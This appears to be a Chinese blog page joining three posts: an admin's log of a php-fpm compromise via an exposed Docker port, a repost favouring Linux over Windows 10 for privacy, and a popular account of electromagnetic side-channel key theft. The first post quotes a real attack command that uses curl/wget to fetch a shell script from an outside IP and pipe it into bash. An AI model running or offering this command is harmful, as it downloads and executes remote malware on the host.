- 问题描述:用postman发送请求,带raw数据,或者用juqery进行post数据提交,获取返回数据后,字符串前方会自动连上post的原始数据。
- 详细描述:nginx + (docker + php7) 环境,php文件中只有一行代码:“echo ‘ok’;”,使用jquery的ajax方式进行post请求,或者用 postman 的 raw 方式提交数据,提交的数据会被原样返回,比如 rwa 中的内容是 “abcd…”,则返回的数据是 “abc…ok”,重启php-fpm后,问题消失,隔一段时间以后,问题又出来了。
- 问题原因:不详
- 问题猜测:服务器有漏洞且已经被利用,以某种方式在 docker 或 php 或 nginx 的某一层对 request 和 response 数据进行了特殊处理,提取了 post 的 raw 数据,在response 的时候,进行了输出,
- 问题影响:由于部分页面的登录页用的是 jquery ajax 的 post 方式提交的用户名密码,因为返回的结果前带了用户名密码字符串,导致无法识别返回结果,登录无效果。
- 临时解决:写脚本定时重启 php-fpm
- 解决状态:未解决
- 2022-02-09 阿里云安全提示 /usr/lib/polkit-1/polkitd 程序有权限漏洞,已被利用执行了‘sh -c [ -f “/bin/bash” ] && (curl -s http://82.117.252.83/ph.sh||wget -q -O- http://82.117.252.83/ph.sh)|bash || (curl -s http://82.117.252.83/ph2.sh||wget -q -O- http://82.117.252.83/ph2.sh)|sh’,更新了polkit 后漏洞已解决。猜测跟本次问题有关。。。
- 重新设置了防火墙,只开放了几个必要的端口。问题还没解决。kill 了polkitd 程序,继续观察。
- 备份docker容器,升级docker到最新版本,依然没解决
- 出现这个问题的不止我一个:https://learnku.com/laravel/t/51759,里面没给出详细的解决办法,但是看讨论结果,好像是php-fpm监听的端口被暴露在公网从而漏洞被利用了。因为centos7 中 docker 使用-p命令的时候,会绕过 firewall 自己设置 iptable。(firewall-cmd –list-ports 中没有开启,但是 telnet ip:9000 能看出来端口处于开放状态)想找一个禁止外网访问 docker 的端口只允许宿主机访问 容器 接口的方法没有找到,但是纯 php-fpm 容器肯定是要暴露端口的,尝试了: /etc/docker/daemon.json 中 添加”iptable”:false , 结果宿主机没法访问到php-fpm了。思来想去,在 php-fpm 的容器里装个 nginx:apt-get install nginx , 容器只暴露80 和 443 端口,容器内部 nginx 转 php 的 9000 , 再隔一段时间观察下。
- 问题没有再出现,看来就是php-fpm端口暴露的问题。如果你也遇到这个问题,赶紧想办法屏蔽php-fpm的外网端口吧
分类:网络安全
为什么你应该放弃 Windows10 而选择 Linux
自从 Windows10 出来以后,各种媒体都报道过它的隐藏间谍功能。ZDNet 列出了一些放弃 Windows10 的理由。
SJVN 在 ZDNet 的报告:
你试试关掉 Windows10 的数据分享功能,坏消息来了:window10 会继续把你的数据分享给微软公司。请选择 Linux 吧。
你可以有很多方法不让 Windows10 泄露你的秘密,但你不能阻止它交谈。Cortana,win10 小娜,语音助手,就算你把她关了,她也会把数据发给微软公司。这些数据包括你的电脑 ID,微软用它来识别你的 PC 机。
所以如果这些泄密给你带来了烦恼,你可以使用老版本 Windows7,或者换到 Linux。然而,当 Windows7 不再提供技术支持的那天到来,如果你还想保留隐私,最终你还是只能选择 Linux。
这里还有些小众的桌面系统能保护你的隐私,比如 BSD 家族的 FreeBSD,PCBSD,NetBSD,eComStation,OS/2。但是,最好的选择还是 Linux,它提供最低的学习曲线。
via: http://www.itworld.com/article/2972587/linux/why-did-you-start-using-linux.html
如何黑掉一台根本不联网的电脑
2014年SONY公司遭到朝鲜黑客入侵,所有机密信息几乎被席卷而去。传说是员工在最后关头拔掉了网线才勉强保住了“底裤”。这种“拔网线”的做法看上去包治百病。然而,只要断网就能保证一台电脑上的信息高枕无忧了吗?(当然不是了,否则下面那么多不就白写了么。。。)
一直以来,拿到一台电脑上的密钥,方法无非有以下三种:
- 直接拿到这台电脑,然后输入木马病毒进行盗取。(此种略微LowB的方法风险在于:如果被电脑主人“捉奸在床”,愤而报警,则需要黑客有一定的逃跑技能)
- 通过互联网入侵目标电脑,远程安装木马病毒,窃取密钥。(大多数黑客都会采用这种方法,同时保证了自己的逼格和人身安全)
- 如果目标电脑不联网,则需要通过能够接触到互联网的介质(例如U盘)把病毒摆渡进目标电脑。(此方法由于逼格满满,技术难度很高,目测只有美国攻击伊朗核电站等少数几个成功案例)
从今天开始,这些方法都弱爆了。
以色列的白帽子黑客(安全研究员)研究出了一种高能的玩法,只需要在你的隔壁放一个大号“听诊器”,根据你电脑工作时散发出的电磁波,就可以捕捉到你的密码信息。
能够听到电脑“自言自语”的电磁波探测器
这种攻击方法的逆天之处在于:
- 速度奇快,只需几秒,密钥到手。
- 根本不涉及密码破译,而是直接捕捉密码明文。所谓隔墙有耳,探囊取物。
- 不需要电脑联网,也不需要接触“受害电脑”。未见出招,胜负已判。
做出这个设备,只需要3000美金的成本。它可以精确地捕捉周围电脑工作时的电磁波,并且放大分析。
那么,这个“窃听器”究竟能够听到什么呢?
被监听的电脑
研究员试着给受害电脑发送了一封GnuPG加密邮件。在电脑打开邮件的过程中,后台进行了ECDH解密操作。而正是这短短几秒的解密过程,散发出的电磁波里携带了“宇宙的秘密”。窃听器分析这几秒钟的电磁波之后发现,每当出现窄频信号的时候,就标志着解密了一段密码。把这些窄频信号放在一起进行解析之后,密文信息就这样轻松地“流淌”了出来。
研究人员穿过了15厘米厚的墙壁,捕获了66次解密过程。仅仅用了3.3秒就最终得到了密钥。
电磁波的波动,标记处为窄频信号
这次实验无异于发现了黑客界的“引力波”,打开了黑客们新的脑洞。这标志着电脑在工作时会自言自语,只要你能够听懂电脑在说什么,那么这台电脑在你面前就没有秘密可言了。用同样的原理,甚至还可以分析出电脑工作中产生的其他信息,例如银行卡密码、私人聊天内容。
研究员Tromer表示:“这种攻击方法很可能会很快从实验室走出去,成为流行的攻击方法。黑客们会研究出更廉价的设备,进一步降低攻击成本。”不过,如果黑客们想要自制这种设备,需要克服一个大的障碍,就是过滤掉背景噪音。在无数电磁波里分析出哪些是电脑工作所发出的,就像在一个喧闹的Party上听到一个姑娘的喃喃细语。达成这种姿势需要相当强的物理学基础,并非传统的死宅程序猿可以搞定。
如果这种攻击方式将来成为黑客的“标配”,还真是细思极恐。传统的进攻手段,需要通过互联网,黑客很容易在你的电脑里留下痕迹,这些痕迹都可以作为他们的罪证;而电磁波被人窃听,却没有任何一种手段可以探测到,所以想要知道自己被“监听”几乎是不可能的。
正像Tromer所说:
我们的计算机在网络世界里被重重机关所保护,但是在物理世界里却近乎裸奔。
当你还在纠结打哪一种马赛克的时候,黑客早已透视了你的皮肤和骨骼。在这种降维打击面前,我们每个人的隐私都更加脆弱了。甚至到了“要想人不知,除非己莫为”的地步。
经过慎重思考,为了防止信息被黑客盗取,电脑的正确用法如下:
完美阅读及吐槽,请猛击:https://linux.cn/article-7022-1.html?utm_source=qqmail&utm_medium=qqmail